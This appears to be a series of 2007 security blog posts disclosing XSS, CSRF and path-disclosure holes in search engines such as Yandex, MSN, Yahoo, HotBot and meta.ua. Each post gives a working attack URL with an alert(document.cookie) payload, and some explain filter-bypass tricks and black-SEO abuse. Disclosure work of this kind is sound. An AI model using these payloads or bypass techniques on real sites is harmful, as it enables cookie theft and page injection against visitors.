Websecurity - Веб безпека

Next participant of the project is Yandex. It is the most popular Russian search engine.

The vulnerability is in Yandex blog search (blogs.yandex.ru) in script for getting botton for your blog. Last time about Yandex blog search I wrote in article New vulnerability at yandex.ru (hole was in ratings of the blogs and was quickly fixed after my informing). This Cross-Site Scripting hole I found 17.03.2007 and it is DOM Based Cross Site Scripting (XSS in DOM).

XSS:

• alert(document.cookie)
• redirector
• html injection

The vulnerability is in id parameter:
http://blogs.yandex.ru/getbutton/?id='}alert(document.cookie);function a(n,h,w,type){//

Moral: searching for blogs and getting buttons for blogs can be risky.

P.S.

Also I prepared others interesting holes concerned with Yandex. So wait for today’s bonus post .

Next participant of the project is Clusty search engine. It is new and popular engine which is meta engine and use clusters (it groups similar results into clusters).

There are two vulnerabilities at main site of Clusty (clusty.com) in error message. These Cross-Site Scripting and Full path disclosure holes I found 24.05.2007. XSS vulnerability works only in Mozilla and Firefox, but not in IE (due the peculiarities of IE rendering engine and plaintext tag which was used by Clusty guys).

XSS:

• alert(document.cookie) (Firefox)
• redirector (Firefox)

The vulnerability is in v:file parameter:
http://clusty.com/search?v%3afile=viv_744%4025%3aTKjQZH&v%3astate=%28root%29%7croot%3C/plaintext%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Note that value of v:file parameter (viv_744%4025%3aTKjQZH) is temporary and works for short time. So you need to have a fresh value for launching attack (use Clusty for searching and get this value).

Full path disclosure:

http://clusty.com/search?v%3afile=viv_738%4020%3avyqK9v-

Moral: error messages at search engines can be dangerous.

New bonus vulnerabilities at MSN. These Cross-Site Scripting holes I found 02.06.2007 and they are also interesting XSS. I found them when I looked for another holes for the project, after Microsoft untimely fixed one that I prepared. Microsoft need to behave itself properly (when participating in the project) and not do such lame things (holes need to be fixed in right time).

The holes at another MSN’s project (autos.msn.com) in search functions (Car Dealer Listings and Used Car Listings). But these two vulnerabilities are the same as MOSEB-05: Vulnerability at shopping.msn.com. These XSS hole based on my Expressive comments space-hack filters bypass technique.

XSS:

• alert(document.cookie) (for IE)
• alert(document.cookie) (for IE)
• redirector (for IE)

The vulnerability is in zip parameter (in both scripts):
http://autos.msn.com/newcar/default.aspx?zip=%22%3C/img%20style=%22xss:e/**/xpression(alert%20(document.cookie))%22%3E

Moral: searching for autos can be dangerous.

P.S.

About Expressive comments filters bypass technique.

This technique (and their advanced version Expressive comments space-hack filters bypass) design for XSS attacks. It makes possible XSS holes at .NET sites in IE browser. It can be used to bypass .NET filters for realization of XSS attacks (these holes at MSN is just some examples).

You can read extra about this technique at ha.ckers.org (about Arian Evans’ work, who independently from me developed the same technique). Owners of .NET sites need to take care of their projects and fix this type of vulnerabilities.

Next participant of the project is MSN. It is 3rd of the top search engines in world (in this case the hole is in one of MSN’s projects). Last time about Microsoft search engine I wrote in article Vulnerabilities at search.live.com.

The vulnerability is in search at MSN Shopping (shopping.msn.com). This Cross-Site Scripting hole I found 16.05.2007 and it is very interesting hole.

There is only one moment - Microsoft fixed this vulnerability before this official disclosure. As I checked this hole at 1st of June, when I was sending notifications to search engines vendors, I found that MS fixed this hole (which was planned for MOSEB). It was bad move from them, because when you are in project, holes need to be fixed in time, not untimely. But I found two others holes at MSN (and they are still working), so MS will be in my project certainly (with working XSS).

XSS:

• alert(document.cookie) (for IE)

The vulnerability is in text parameter:
http://shopping.msn.com/noresults/shp/?text=%3C/img%20style=%22xss:e/**/xpression(alert%20(document.cookie))%22%3E

This technique I called Expressive comments filters bypass (using /**/ trick in expression). And it is even more advanced technique, because MS filtered “alert(document.cookie)”, and I used space between alert and bracket - “alert%20(document.cookie)” (this is another variant of my space-hack technique, which I intoduced in Month of MySpace Bugs in MOMBY-00001011 bug). So I called it Expressive comments space-hack filters bypass technique.

Moral: searching for shopping can be dangerous.

P.S.

I prepared two others holes at MSN. So wait for today’s bonus post Microsoft can’t hide from me, the time has come for vulnerabilities at their sites.

Next participant of the project is Gigablast search engine. It is one of the popular search engines (as I found out in Internet).

The vulnerability is at Gigablast (www.gigablast.com) in Add a Url script. This Cross-Site Scripting hole I found 23.05.2007.

XSS:

• alert(document.cookie)
• redirector
• html injection (PR5)

The vulnerability is in u parameter:
http://www.gigablast.com/addurl?u=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also page with html injection hole has PR5. So black seo guys can be happy.

Moral: adding url into search engines can be dangerous.

New bonus vulnerabilities at www.hotbot.com. These Cross-Site Scripting holes I found yesterday, 02.06.2007 (when I decided to make a bonus bug for you for 3rd day of the project), and these are persistent XSS.

The holes at main domain of search engine http://www.hotbot.com, like MOSEB-03: Vulnerability at www.hotbot.com, but these vulnerabilities (two holes) are much more interesting. This is a complex CSRF + XSS attack which make these persistent XSS working.

CSRF + XSS:

• alert(document.cookie) (1st hole)
• alert(document.cookie) (2nd hole)
• redirector (2nd hole)

The vulnerability is in prefs_filters.php script (in dfi and dfe parameters) which designed to save filters. And this function can be used to attack engine’s visitors:
http://www.hotbot.com/prefs_filters.php?prov=ask&add_domain=on&dfi=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&save=web

First you use CSRF (for example via frame or iframe tag) to save XSS code (into user’s cookie). And then user must go to http://www.hotbot.com (you may trick him to visit the site) to execute XSS hole.

Moral: even visiting main page of search engine can be dangerous.

Note, that HotBot belongs to Lycos. So Lycos also responsible for these vulnerabilities.

Next participant of the project is HotBot search engine. It is one of the popular search engines and it is meta engine, so it use Ask and MSN engines directly for searching.

The vulnerability is in HotBot Web Search (www.hotbot.com). This Cross-Site Scripting hole I found 23.05.2007.

XSS:

• alert(document.cookie)
• redirector
• html injection (PR8)

The vulnerability is in query parameter:
http://www.hotbot.com/?query=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also page with html injection hole has PR8. It is a dream (and with me dreams come true). And this is best choice for black seo guys .

Moral: searching in meta engines can be dangerous.

Note, that HotBot belongs to Lycos. So Lycos also responsible for this hole. And don’t worry guys, Lycos will also be in MOSEB.

P.S.

Also I prepared another (and more interesting) hole at www.hotbot.com. So wait for today’s bonus post .

Next participant of the project is Yahoo search engine. It is 2nd of the top search engines in world.

The vulnerability is in Image Search of Yahoo! Search (http://images.search.yahoo.com). This Cross-Site Scripting hole I found 08.04.2007.

XSS:

• alert(’XSS’)
• alert(document.cookie)
• redirector

The vulnerability is in rcurl parameter:
http://images.search.yahoo.com/search/images/view?rcurl=%22%20onLoad=%22javascript:alert(document.cookie)&rurl=test

Moral: searching for images can be dangerous.

New bonus vulnerability at meta.ua. This Cross-Site Scripting hole I found today, 01.06.2007.

The hole at main domain of search engine http://meta.ua, like MOSEB-01: Vulnerability at meta.ua, but in another script.

XSS:

• alert(document.cookie)
• redirector
• html injection

The vulnerability is in t parameter:
http://meta.ua/ua/topics.asp?t=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: surfing list of sites in search engine can be dangerous.

P.S.

Meta guys need to fix todays MOSEB holes, as they did last time with vulnerabilities at horo.meta.ua (I post about them 3 days ago). Search engine Meta.ua are frequent guest in my news.

Month of Search Engines Bugs has started.

The first participant of the project is search engine meta.ua. Company Meta is a Ukrainian search engine vendor and meta.ua is a leading Ukrainian engine.

As you can guess, I put Meta at the beginning of participants’ list, because it is my native engine (single Ukrainian search engine in the list). And I very care about the state of security of this engine.

The vulnerability which I present for you was already posted at my site before. The hole at mine search engine site http://meta.ua was found at 22.09.2006. There were two holes (at q and url parameters) and I informed Meta guys and they fixed those holes. But they did it incompletely. In one parameter hole was lefted (with some query modification), so here it is.

XSS:

• alert(document.cookie)
• redirector
• html injection (PR4)

The vulnerability is in url parameter:
http://meta.ua/search.asp?url=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Also page with html injection hole has PR4. So it will be interesting for black seo guys.

Moral: if I told you about holes at your site and you fixed them, try to fix them completely.

P.S.

This hole is old already, and for this reason I prepared a new hole at meta.ua. So there will be bonus post today .